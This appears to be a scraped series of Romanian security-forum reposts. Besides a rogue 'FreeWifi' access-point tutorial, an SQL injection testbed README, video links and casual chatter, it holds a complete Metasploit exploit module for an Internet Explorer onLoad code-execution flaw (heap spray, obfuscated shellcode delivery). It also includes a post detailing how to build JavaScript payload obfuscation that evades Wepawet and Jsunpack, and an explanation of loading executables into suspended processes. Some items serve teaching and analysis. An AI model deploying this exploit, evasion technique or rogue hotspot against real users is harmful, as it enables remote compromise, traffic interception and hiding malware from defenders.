Nytro

Setup a Fake Access Point With BackTrack5 Posted Nov 6 2011 by NightRanger Recently I needed to setup a fake access point for a presentation, I fired up my Backtrack5 VM, Connected my Alfa AWUS036H USB adapter and started to configure the Fake AP. There are a lot of Tutorials and Scripts for setting up a Fake AP, The “Gerix” tool also have an option to auto set a Fake AP (for some reason this tool never worked for me). I started to setup my fake AP and had run into some trouble for a strange reason. I decided to put my experience here hopefully you’ll find it useful. Started by putting my Wlan interface in monitor mode root@Blackbox:~/fakeap# airmon-ng start wlan1 Found 1 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 1558 dhclient Interface Chipset Driver wlan1 Realtek RTL8187L rtl8187 - [phy1]SIOCSIFFLAGS: Unknown error 132 (monitor mode enabled on mon0) I noticed the following error: “Unknown error 132? Tried using airodump-ng to see what happens… root@Blackbox:~/fakeap# airodump-ng mon0 ioctl(SIOCSIFFLAGS) failed: Unknown error 132 Got the same error. The solution was simply to unload the RTL8187 and Load the R8187 driver instead as follows: root@Blackbox:~/fakeap# rmmod rtl8187 root@Blackbox:~/fakeap# modprobe r8187 Tried putting wlan In monitor mode again root@Blackbox:~/fakeap# airmon-ng start wlan1 Found 1 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 1558 dhclient Interface Chipset Driver wlan1 RTL8187 r8187 (monitor mode enabled) Well, that fixed the problem root@Blackbox:~/fakeap# iwconfig lo no wireless extensions. eth3 no wireless extensions. wlan1 802.11b/g Mode:Monitor Channel=10 Bit Rate=11 Mb/s Tx-Power=5 dBm Retry:on Fragment thr:off Link Quality=0/100 Signal level=50 dBm Noise level=-156 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 Now we can proceed to the fake ap setup process 1. Install a DHCP Server apt-get install dhcp3-server 2. Edit “/etc/dhcp3/dhcpd.conf” as follows (You can change ip address, pool and dns server as needed): ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; authoritative; subnet 10.0.0.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 10.0.0.255; option routers 10.0.0.254; option domain-name-servers 8.8.8.8; range 10.0.0.1 10.0.0.140; } 3. Put your wlan in monitor mode airmon-ng start wlan1 4. Start airbase-ng, you will need to specify the AP SSID and channel number airbase-ng -e FreeWifi -c 11 -v wlan1 & 5. Airbase will create a new adapter “at0? you will need to enable it and assign it with an ip address and subnet mask, the ip address you assign to this interface will be the default gateway that you specified in the dhcpd.conf file. ifconfig at0 up ifconfig at0 10.0.0.254 netmask 255.255.255.0 6. Add a route route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254 7. Setup ip tables iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT • Eth3 is my external interface which is connected to the internet change it to whatever yours is iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE 8. Clear dhcp leases echo > '/var/lib/dhcp3/dhcpd.leases' 9. Create a symlink to dhcpd.pid (skipping this may cause an error when starting dhcp server) ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid 10. Start the DHCP server dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 & 11. Don’t forget to enable IP forwarding echo "1" > /proc/sys/net/ipv4/ip_forward That’s All Folks! I have created a simple bash script to automate this process you will just need to change it to suit your configuration. #!/bin/bash echo "Killing Airbase-ng..." pkill airbase-ng sleep 2; echo "Killing DHCP..." pkill dhcpd3 sleep 5; echo "Putting Wlan In Monitor Mode..." airmon-ng stop wlan1 # Change to your wlan interface sleep 5; airmon-ng start wlan1 # Change to your wlan interface sleep 5; echo "Starting Fake AP..." airbase-ng -e FreeWifi -c 11 -v wlan1 & # Change essid, channel and interface sleep 5; ifconfig at0 up ifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpd.conf route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254 sleep 5; iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE # Change eth3 to your internet facing interface echo > '/var/lib/dhcp3/dhcpd.leases' ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 & sleep 5; echo Sursa: http://exploit.co.il/hacking/set-fake-access-point-backtrack5/

[h=1]SpiderLabs / SQLol[/h] SQLol Released at Austin Hackers Association meeting 0x3f Daniel Crowley <dcrowley@trustwave.com> http://www.trustwave.com INTRODUCTION ============ ***WARNING: SQLol IS INTENTIONALLY VULNERABLE. DO NOT USE ON A PRODUCTION WEB SERVER. DO NOT EXPOSE SQLol IN AN UNTRUSTED ENVIRONMENT.*** SQLol is a configurable SQL injection testbed. SQLol allows you to exploit SQL injection flaws, but furthermore allows a large amount of control over the manifestation of the flaw. To better understand why SQLol exists, please read the sonnet below: I humbly posit that the current state (With much respect to work which does precede) Of test-beds made with vulns to demonstrate Is lacking some in flexibility. Two options are presented present-day, As far as when one deals with S-Q-L: A blind injection (bool or time delay) And UNION statement hax (oh gee, how swell…) Imagine we could choose how queries read And how our input sanitizes, oh! How nimble and specific we could be To recreate our ‘sploit scenarios. And thus is S-Q-L-O-L conceived: That we can study how to pwn DBs. Options: Type of query Location within query Type and level of sanitization Level of query output Verbosity of error messages Visibility of query Injection string entry point Other cool things: Reset button Challenges Support for multiple database systems REQUIREMENTS ============ PHP 5.x Web server Database server (MySQL, PostgreSQL and SQLite have been tested, others may work) ADODB library (included) USAGE ===== Place the SQLol source files on your Web server and open in a Web browser. Modify the configuration file #sqlol_directory#/includes/database.config.php to point to your installed database server. Use the resetbutton.php script to write the SQLol database, then start playing! COPYRIGHT ========= SQLol - A configurable SQL injection testbed Daniel "unicornFurnace" Crowley Copyright (C) 2012 Trustwave Holdings, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/> A configurable SQL injection test-bed — Read more https://www.trustwave.com/spiderLabs.php Sursa: https://github.com/SpiderLabs/SQLol

[h=2]Obfuscated JavaScript 2.0 - Building an encoder[/h] JavaScript is a wonderful language full of tricks, power and the element of confusion. In this day and age it is likely that most people handling PDF, JAVA, Flash or browser-based exploits has either seen, reversed or been owned due to JavaScript. To this day attackers continue to find clever new ways of hiding their exploit or making the reversing process a nightmare, but not many have turned to the web 2.0 features. M86 wrote up an entry a last week detailing some malware that used AJAX to fetch a portion of its shellcode. Oddly enough, over the winter break, I decided it would be fun to write my own JavaScript encoder with the intention of making it a royal pain to reverse. My encoder also used AJAX, but in a nastier way, so I felt now was the time to do a write up on it. That and I am in Miami this week attending Infiltrate where there is nothing but offensive events happening all around me, so this is my attempt to fit in. This post won't cover the creation of the encoder as that in itself could take a couple posts alone. Instead, focus will be placed on some of the techniques I used and how the overall output product is generated. Comparisons will also be done between my output versus what is currently being seen in the wild. Routines The routines used in my encoder are similar to what has already been put out by attackers, but with some more technical aspects to ensure the code is not easily reversed. The following describes the flow of transformation: Code to be encoded is taken in Encoder sets and splits are generated to be used later in the routines Code is ran through a function that converts ASCII to its number form Each number is than mapped to a random alpha key resulting in a single character Each character is mapped against the encoder set which results in a long string made up of 3 unique characters Alpha key is stored server side and mapped to a seed token Round one decryption routine is built taking in all variables listed above into account (additional data for round two decryption routine is stored local to the class) Output generated from routine one is fed to routine two Steps 1-5 are ran again Round two decryption routine is built taking pieces of data from round one Output Code and Results The output code is large, so here is a screenshot capturing the bulk portion of the code: As you can see, it clearly looks like something malicious is happening here, but without reversing you are left guessing what exploit could be used in the delivery. If you want a live example, visit here and if you just want the output sample then see here. After running my code through Wepawet and Jsunpack a few times, I was able to tune the script such that it would be flagged as benign. This is mostly due to the fact that jQuery is required to fully decode the payload and neither of these engines seem to account for that. In the example I decided not to output the original code that I fed to the encoder, so if you want to have a shot at reversing it, go ahead and email your answer. There won't be any prizes for solving the puzzle, but it could be good practice. Variable Names Almost all obfuscated JS makes a point of creating random variable names. At first glance it is difficult to identify what is going on, but after doing several finds and replaces, you have a pretty good idea where to hook so you get the output result. Instead of doing a 100% random sequence, I opted for something a bit more annoying. All my variable names are derived off a single string of one letter that has randomly been camel cased. Each variable is essentially carved from the core string at random lengths and offsets. This results in variable names that are sometimes contained within other variable names. To illustrate what I mean, take a look at this example: As you can see, no longer can you simply find and replace every instance of a variable. In fact, you can almost never do that with any one variable without first checking where else it occurs. Not only is this effective in making the code difficult to read, but it also still retains the same effect that existing code achieves. Invisible Payloads Within the ASCII character set are numerous characters that print as blanks. Unfortunately, only four of these characters are printable in a web environment. These characters are spaces, horizontal tabs, vertical tabs and new pages. It is ideal to have one of these four characters serve as a spacer as it makes identifying where separation begins and ends on the encoded output. This leaves three characters left that can be used to encode our input code. Fortunately, if we do not take case into account, then we have 3 to the 9th power combinations (27) allowing us to represent the entire lowercase alphabet in invisible characters (this process is used in step 5 of the flow). Initially all encoded output code was done using the three letters, but that resulted in the same pattern every time. At first this would be a pain to reverse, but once you knew what you were dealing with, it wouldn't be hard at all. To combat against this issue, I decided to randomly select the spacer from the four values, and included the remaining three in an array of "encoding characters". The output of this would sometimes result in a 100% visible encoded output, but other times it results in half-way visible or three-quarters visible output making it difficult to identify which invisible character is being used for what. Below is a small portion of the output code after being encoded: Preemptive Hooks I wrote about JavaScript Hookers a few weeks ago and it dawned on me that these did not exist in malicious output. If I were hooking certain functions to reverse a payload, then why couldn't an attacker do the same? Following the same concept as a reverse engineer, I hooked "eval", "alert" and reassigned "console" and "document" before clobbering them. Essentially what this means is that if you try and use "console.log" or "alert" when reversing this code, it will send you into an infinite loop. Also, because I reassign certain functionality to random variables, you need to also keep those preserved otherwise you will break the code later when they get used. To combat against this you would need to inject JS after my hooks and redefine the functions back to their original state. I am not certain how this would be done, but if in the event someone managed to do it, I decided to throw in another problem. Some hooks are defined in one round and then later used in the second round decoder meaning you can't just redefine everything back to how it was. Furthermore, on the second round, I clobber all global functions listed above again therefore forcing the user to inject another override. AJAX Required As part of the decoding routine, AJAX is used to pass data back to the server to get the proper return value. This is based on the alpha key generated and stored during the encoding process. Since this key is random, you are out of luck if you don't have access to the server unless of course you want to brute force the values. The AJAX portion of the encoding is only present in round two of the decoding routine, so at first glance, there is no mention of any AJAX. If you copy and paste the script into a reversing environment, you will be able to decode the first round without issue, but the second round will leave you stuck. The nature of AJAX forces you to hardcode a URL that is within the same domain as your hosted code. This is not really an issue as we can control this value server-side, but to pull the correct alpha key, we need to pass a unique seed token. Someone reversing the code could copy the URL and parameters to just get the values and subvert the whole process. To combat against this, the amount of iterations is calculated and stored with the seed token and alpha key mapping. This means that the payload is literally only good to run for one and one time only. After the sequence has ran and talked with the sever for its set call limit, it starts spewing random values causing the decoding to fail. Exception Clauses Try/except clauses have been known to cause problems for automated analysis engines, but that has been fixed to some extent. For the AJAX portion of the code to work above, I include jQuery (it is small and ubiquitous) which means it uses its own syntax for certain actions. Analysis engines are currently not smart enough to include these libraries and as a result, we can use this against them in our try/except clauses. If we wrap out entire code base and routines in try/except clauses where the try attempts to do something with jQuery, then we know the engine will fail and therefore hit the exception catch. This simple, yet effective technique is used in both rounds of the decoding process. It should be noted that in some cases the catch portion of the code returns actual data that can be used within the overall decoding process. This means that the code won't break or cease to function just because the exception is hit. In other words, a good exception is not wasted and instead is used to throw the analyst off. If you are not carful, you could easily miss that fact that the catch is caught in the round two decryption resulting in random characters being generated for the output string. Encoded Code/Shellcode Detour One of the less technical or amusing pieces of the code is what I call the "detour data". This is just essentially random code made to look interesting so the user spends time saving, reversing or trying to make sense of it. There is nothing stopping it from getting used later on, but for now it is not and just takes up space. Since it is random, it too changes giving it the appearance of being useful. Comment Bombs When reversing obfuscated JS, it is normal to remove it from the live environment and throw it into a safe place where it can be ran. The first tool that comes to mind for dealing with this sort of problem is Malzilla. It does a great job making ugly code readable and assisting in the process of reversing. Unfortunately the code used to "beautify" the JS is flawed to some extent. If I throw in some specially made comments, when you hit the cleanup, it completely sprays the comment data into the code therefore breaking it. This is by no means advanced or technical, but can be confusing if done near a single instruction if/else statement. Tailored Output The code currently generated by the encoder does not account for the browser version being used. Keep in mind that if you know the browser or have a reasonable idea of what version it is, then there are certain things you can do to make life hell or tailor your output code to make it less bulky. As an example, think of Firefox and the Firebug extension. Firebug is great, almost too great for doing live analysis or code changes. If we can detect the presence of Firebug being on, then why not kill ourselves to avoid being analyzed. The current output will not kill itself if it sense Firebug, but it will clear the console to avoid all the AJAX calls from being seen. This is just a small example, but it helps illustrate what more could be done. Future Improvements One and Done Following with the same trend on limiting AJAX calls, there is nothing stopping an attacker form generating a random directory to hold a randomly named JS file that deletes itself after being ran once. Imagine a user gets compromised and you now want to look to see what was used only to find that file no longer exists on the server and the payload is useless without the proper decoding handler. I have toyed around with this, but do not intend on sharing it at this time. Secure Chatting HTTP GET requests are used when making the AJAX call back to the server. This could easily be changed to HTTPS POST requests therefore hiding what was sent and killing any hope of successfully understanding what was going on between the client and server. Enabling such a setup is as simple as changing the web server configuration and AJAX call within the code. Conclusions Once again, this example goes to show that attackers can do a lot more to make life hell. The fact that they don't is a huge relief to us, but given we are already starting to see AJAX used to fetch shellcode, I can say with certainty that these sort of techniques and more are going to show up in malicious code soon. If we start working against them now, it will be easier when they are being used for evil. At this point in time I am not releasing the encoder as that would spoil the challenge if someone wanted to accept it, but if you are interested in knowing more or discussing the process, email me. Sursa: Obfuscated JavaScript 2.0 - Building an encoder - 9b+

[h=1]CNN Inside Anonymous[/h] http://www.youtube.com/watch?v=NDhEHkqGbxA Uploaded by LegionIsUnity on Jan 14, 2012 CNN reporter Amber Lyon (twitter: @AmberLyon) takes an inside look at the hactivist group "Anonymous". Original air date: Jan 14, 2012 ================================================== Download: CNN Inside Anonymous.wmv Bla bla...

Da, eu vad destul de des Linux pe niste Flash-uri de 64 MB si procesoare ARM.

Introduction to Network Security Toolkit (NST) The Network Security Toolkit (NST) is a ISO live CD/DVD (NST Live) based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms. The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of Open Source Network Security Tools. The majority of tools published in the article: Top 100 Security Tools by INSECURE.ORG are available in the toolkit. Some of the tools available in this live are: Ntop, wireshark, nmap with the vizualization tool ZenMap and kismet. Many tasks that can be performed within NST are available through a web interface called NST WUI. Among the tools that can be used through this interface are nmap with the vizualization tool ZenMap, ntop, a session manager for VNC, a minicom-based terminal server, serial port monitoring, and WPA PSK management. You can read some of my articles about Nmap and Ntop following the links, for Nmap you got also Zenmap. Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database. On NST are also available Nagios and Argus, 2 software that can be used for network monitoring, you can check the status of various services, like web server, pop/imap mails erver or other services that in general you can test directly with a network connection. Another feature nice, and really “scenic” is that NST includes visualization of ntop, wireshark, traceroute and kismet data by geocoding the host addresses and displaying them via Google Earth. For this NST use a custom tool: nstgeolocate — Geolocate hosts obtained from an ‘ntop’ session or Geolocate IPv4 Address conversations from a network packet capture file on a Mercator World Map projection or Global imagery. There is also a browser-based packet capture and protocol analysis system capable of monitoring up to four network interfaces using Wireshark, as well as a Snort-based intrusion detection system with a “collector” backend that stores incidents in a MySQL database. For web developers, there is also a JavaScript console with a built-in object library with functions that aid the development of dynamic web pages. A great guide on what is available on the live distro and how to use each tools it’s present of the official wiki Conclusions This live CD it’s really filled with security tools and utility, so it could be really useful to set up in few minutes a location where you can do a security audit of a network or some hosts. It’s also really interesting the option to put it on a virtual machine, on the wiki there is a good how to on how to put NST on Virtualbox. So in few words: try and use it for your security audit, you’ll be satisfied for sure. Sursa: http://linuxaria.com/article/introduction-to-network-security-toolkit-nst?lang=en

Exploiting embedded systems Overview: - Embedded systems basics - Real Time OS - The ARM architecture - The JTAG interface - The UART interface .............................. Download: http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-Jack.pdf E o prezentare, dar se pot observa conceptele.

Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability', 'Description' => %q{ This bug is triggered when the browser handles a JavaScript 'onLoad' handler in conjunction with an improperly initialized 'window()' JavaScript function. This exploit results in a call to an address lower than the heap. The javascript prompt() places our shellcode near where the call operand points to. We call prompt() multiple times in separate iframes to place our return address. We hide the prompts in a popup window behind the main window. We spray the heap a second time with our shellcode and point the return address to the heap. I use a fairly high address to make this exploit more reliable. IE will crash when the exploit completes. Also, please note that Internet Explorer must allow popups in order to continue exploitation. }, 'License' => MSF_LICENSE, 'Author' => [ 'Benjamin Tobias Franz', # Discovery 'Stuart Pearson', # Proof of Concept 'Sam Sharps' # Metasploit port ], 'References' => [ ['MSB', 'MS05-054'], ['CVE', '2005-1790'], ['OSVDB', '17094'], ['URL', 'http://www.securityfocus.com/bid/13799/info'], ['URL', 'http://www.cvedetails.com/cve/CVE-2005-1790'], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", 'Compat' => { 'ConnectionType' => '-find', }, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Internet Explorer 6 on Windows XP', { 'iframes' => 4 } ], [ 'Internet Explorer 6 Windows 2000', { 'iframes' => 8 } ], ], 'DisclosureDate' => 'Nov 21 2005', 'DefaultTarget' => 0)) end def exploit @var_redir = rand_text_alpha(rand(100)+1) super end def auto_target(cli, request) mytarget = nil agent = request.headers['User-Agent'] print_status("Checking user agent: #{agent}") if (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.1/) mytarget = targets[0] # IE6 on XP elsif (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.0/) mytarget = targets[1] # IE6 on 2000 else print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") end mytarget end def on_request_uri(cli, request) mytarget = auto_target(cli, request) var_title = rand_text_alpha(rand(100) + 1) func_main = rand_text_alpha(rand(100) + 1) heapspray = ::Rex::Exploitation::JSObfu.new %Q| function heapspray() { shellcode = unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}'); var bigblock = unescape("#{Rex::Text.to_unescape(make_nops(4))}"); var headersize = 20; var slackspace = headersize + shellcode.length; while (bigblock.length < slackspace) bigblock += bigblock; var fillblock = bigblock.substring(0,slackspace); var block = bigblock.substring(0,bigblock.length - slackspace); while (block.length + slackspace < 0x40000) block = block + block + fillblock; var memory = new Array(); for (i = 0; i < 250; i++){ memory[i] = block + shellcode } var ret = ""; var fillmem = ""; for (i = 0; i < 500; i++) ret += unescape("%u0F0F%u0F0F"); for (i = 0; i < 200; i++) fillmem += ret; prompt(fillmem, ""); } | heapspray.obfuscate nofunc = ::Rex::Exploitation::JSObfu.new %Q| if (document.location.href.indexOf("#{@var_redir}") == -1) { var counter = 0; top.consoleRef = open('','BlankWindow', 'width=100,height=100' +',menubar=0' +',toolbar=1' +',status=0' +',scrollbars=0' +',left=1' +',top=1' +',resizable=1') self.focus() for (counter = 0; counter < #{mytarget['iframes']}; counter++) { top.consoleRef.document.writeln('<iframe width=1 height=1 src='+document.location.href+'?p=#{@var_redir}</iframe>'); } document.writeln("<body onload=\\"setTimeout('#{func_main}()',6000)\\">"); } else { #{heapspray.sym('heapspray')}(); } | nofunc.obfuscate main = %Q| function #{func_main}() { document.write("<TITLE>#{var_title}</TITLE>"); document.write("<body onload=window();>"); window.location.reload(); } | html = %Q| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"> <html> <head> <meta http-equiv="Content-Language" content="en-gb"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <script> #{nofunc} #{heapspray} #{main} </script> </head> <body> </body> </html> | print_status("Sending #{self.name} to client #{cli.peerhost}") # Transmit the compressed response to the client send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' }) # Handle the payload handler(cli) end end Sursa: Microsoft Internet Explorer JavaScript OnLoad Handler Code Execution | Inj3ct0r - exploit database : vulnerability : 0day : shellcode

[h=1]OpenVSP[/h] NASA Open Source Parametric Geometry OpenVSP is a parametric aircraft geometry tool. OpenVSP allows the user to create a 3D model of an aircraft defined by common engineering parameters. This model can be processed into formats suitable for engineering analysis. The predecessors to OpenVSP have been developed by J.R. Gloudemans and others for NASA since the early 1990's. On January 10 2012, OpenVSP was released as an open source project under the NASA Open Source Agreement (NOSA) version 1.3. We are still in the process of setting up all of the things which allow an open source project to work. In the meantime, get OpenVSP for yourself from the links below. OpenVSP 2.0 for Windows OpenVSP 2.0 for Mac OS X OpenVSP 2.0 Community Edition Source Code Interesanta ideea. Si ce cod sursa "urat": lcsfit_(&c__201, xt, yt, &c_true, "B", &c__1, &xtp, &ym, &ym, (ftnlen)1); xo = xt[0]; xl[0] = xt[199]; tr = ym * 2.f / (xl[0] - xo); rat = toc / tr; sf = rat; if (toc > e && (r__1 = rat - 1.f, dabs(r__1)) > 1e-4f && it <= 10) { goto L400; } Sursa: OpenVSP

Daca esti bun nu conteaza domeniul, o sa iti gasesti de munca. E mai greu la inceput, dar usor-usor o sa gasesti ceva frumos, care sa iti placa si care sa iti aduca venituri substantiale. Pe partea de PHP se cauta, dar sunt multi si trebuie sa fii bun, Java inca e cautat, dar nu stiu cat timp o sa mai fie, posturi de administrator nu sunt foarte multe, dar cred ca se castiga bine, iar C++ cred intotdeauna va fi cautat. Vezi si tu pe bestjobs/ejobs ce se cauta, cauta in functie de experienta ceruta si vezi ce criterii se cer la fiecare. O sa "pierzi" doua zile cu asta, dar apoi vei stii exact ce ai de facut.

A.c.a.b.

Stai asa sa ghicesc in globul de cristal care e problema cu contul tau...

Varianta binara cred ca poate fi mai mica decat dimensiunea sursei. La Kaspersky stiu ca erau mai multe produse, prin 2007, sau cand aparuse o sursa, pe care o am si eu. Insa aveti careva coduri sursa de la Norton sau McAfee? Le-ati gasit pe undeva? Daca gasiti sa postati aici va rog, sunt si oameni interesati, am gasit chestii interesante in codul de la Kaspersky. Edit: http://uk.reuters.com/article/2012/01/14/uk-symantec-hacker-idUKTRE80D09T20120114

Inca am fani desi nu mai am timp sa dau banuri si avertismente ca in tinerete.

Citeste mai intai despre structura executabilelor: Portable Executable - Wikipedia, the free encyclopedia Peering Inside the PE: A Tour of the Win32 Portable Executable File Format Inside Windows: An In-Depth Look into the Win32 Portable Executable File Format Inside Windows: An In-Depth Look into the Win32 Portable Executable File Format, Part 2 Microsoft PE and COFF Specification Ai putea sa te uiti si peste: The .NET File Format - CodeProject® Problema e ca tu vrei exemplu pentru .NET... Nu prea am vazut exemple in .NET, cauta la sectiunea Programare, o sa gasesti multe lucruri utile, dar de .NET mai putine. Trebuie creat un nou proces (suspendat). Aloci spatiu, si incarci executabilul (la ImageBase, dimensiunea specificata de OptionalHeader, adica SizeOfimage). Trebuie insa sa fii atent sa incarci fiecare sectiune, aliniata la dimensiunea specificata in structura executabilului, dupa ce scrii headerele (primul lucru pe care il faci). Si cu asta l-ai incarcat in memorie, nu e extrem de complicat. Apoi mai trebuie doar sa cedezi executia Entrypoint-ului. WinAPI iti ofera tot ce ai nevoie, poti face identic si in .NET cu dllimport, dar nu are rost. Nu stiu daca .NET are clase si functii speciale pentru astfel de actiuni, ar cam trebui sa fie.

Cred ca ai mai instalat o data libnet si nu libnet-dev. root@bt:~/libnet-1.1.5# ./configure Si nu root@bt:~/libnet-dev-1.1.5# ./configureNu stiu, ar trebui sa mearga.

Tu ai citit ce am scris eu? configure: error: libnet0 (dev) is required for this program

Problema e ca iti trebuie libnet development headers (de la development provine acel "dev" de acolo, libnet probabil era deja instalata). Cred ca asta e: libnet-dev | Free software downloads at SourceForge.net

Astea sunt arhicunoscute, sunt multe alte "comenzi"... Deschide executabilul de la messenger cu un Hex Editor si uita-te pe acolo.

In multe locuri apare de la dracia asta de iconita: http://mystatus.skype.com/smallicon/sample.skype90 O sa reparam azi-maine.

Ceva cu mai mult de 10 randuri nu sunteti in stare sa cititi si sa va dati cu parerea.

Intro To Exploits - Part 1 http://www.youtube.com/watch?v=NzGB-8Sntqc&feature=player_embedded Description: **This video and Part 2 Segment 1 are more lecture based videos** What's in this video? -Coding Practices -Defining Functions of Interest -Introduction To Shellcode I recommend watching in full-screen due to quality issues. This is part 1 of 5. More to come over the next few weeks. Also, sorry about how I was talking in the video, I'm not a strong speaker. Sursa: Intro To Exploits - Part 1 Intro To Exploits - Part 2 (Shellcode) http://www.youtube.com/watch?v=-QlaRVn1K1o&feature=player_embedded Description: I recommend watching in full-screen due to quality issues. This is the first of two videos for part 2 of 5. The topic of discussion for this video is an expanded explanation of shellcode. -How shellcode is executed -Architecture types -Assembly/hex examples Also, sorry about how I was talking in the video, I'm not a strong speaker. Sursa: Intro To Exploits - Part 2 (Shellcode) Intro To Exploits - Part 2 (Shellcode Cont.) http://www.youtube.com/watch?v=m-AxrZxvu8o&feature=player_embedded Description: ****This video demonstrates the concepts of how shellcode works**** I recommend watching in full-screen due to quality issues. This is the second of two videos for part 2 of 5. This video expands even more on the previous video, and we end Part 2 with a visual example of how shellcode operates. -Different purposes of shellcode -Security evasion -Visual example of shellcode in action (bind and reverse shells) Sursa: Intro To Exploits - Part 2 (Shellcode Cont.) Intro To Exploits - Part 3 (Fuzzing) http://www.youtube.com/watch?v=v3wOMXZykrE&feature=player_embedded Description: The topic of this video is fuzzing. At the end of Part 3, we fuzz a simple tcp echo server. -Types of Fuzzers -How to know if a fuzzer was successful -Finding buffer size I hope you learned a lot as fuzzing is very undocumented outside of the security industry, and the technique itself is more used for auditing many programs with a generic testing tool. The downside of fuzzing is that it is very limited to what it can test, and how deep into a program it can test. Fuzzing is more for an entry point stress test, than it would be for full-on code auditing. Sursa: Intro To Exploits - Part 3 (Fuzzing) Intro To Exploits - Part 4 (Reverse Engineering) http://www.youtube.com/watch?v=kMWc1PiKWUQ&feature=player_embedded Description: ****Topic for the video is Reverse Engineering**** This video covers the basics of disassembling/reverse engineering. This is a great video, as I show you how to explore different functions within gdb. This is an awesome tactic for determining what a program might be able to do. -Exploring the CPU -Differentiating functions from other stack procedures -Finding functions and disassembling them -Finding return addresses Reverse Engineering is a very broad category, and in its own right deserves its own video series. The steps I go through in this video are more for mapping out a program, rather than editing asm code to change execution flow. Sorry for the pause half way through the video. I rage-quited half way through filming it. Sursa: Intro To Exploits - Part 4 (Reverse Engineering) Intro To Exploits - Part 5 (Scenario) http://www.youtube.com/watch?v=5iUaq_H6wf8&feature=player_embedded Description: ***This video is intended for learning purposes only. In no way, shape, or form, is the sole purpose of this video intended as a solution to the IO wargame.*** What's in this video? In this video, we put together all of the information we have learned from the previous videos, and apply it to a practical (but very unlikely) buffer overflow situation. -On the fly exploitation (IO smashthestack level 5) Sursa: Intro To Exploits - Part 5 (Scenario) [h=4]Intro To Exploits - Part 5 (Scenario Cont.)[/h] http://www.youtube.com/watch?v=NzD67lD9OQU&feature=player_embedded Description: ***This video is intended for learning purposes only. In no way, shape, or form, is the sole purpose of this video intended to be used as a solution to the IO wargame.*** This video concludes the previous video, and the series. I hope I have helped new people learn a lot, and refresh the memories of the more seasoned folks. Thank you for watching! Sursa: http://www.securitytube.net/video/2649

[h=4]Cracking Hashes From A Meterpreter Session With Hashcat[/h] Description: Cracking Hashes From a Meterpreter Session with Hashcat , FOLLOW @sL0ps Sursa: Cracking Hashes From A Meterpreter Session With Hashcat

[h=4]Shellcode2Exe Shellcode Analysis[/h] http://www.youtube.com/watch?v=FTDZyYt7Fqk&feature=player_embedded Description: Converting shellcode into an executable is a simple analysis technique that allows you to use your favorite debugger to analyze the code at run time. This video describes the input and output formats supported by the Shellcode2Exe tool. Sursa: Shellcode2Exe Shellcode Analysis

[h=4]Scdbg - Shellcode Analysis[/h] Description: This video covers basic use of the scdbg tool to analyze several types of shellcode. scdbg is a tool written around the libemu library which runs shellcode in an emulated environment and displays all of the Windows API called during execution. scdbg also includes an integrated debug shell and complex options such as a report mode which tell you intimate details about how the shellcode was constructed. scdbg is open source and freely available. Versions are available for both Windows and Linux. Homepage: RE Corner Sursa: Scdbg - Shellcode Analysis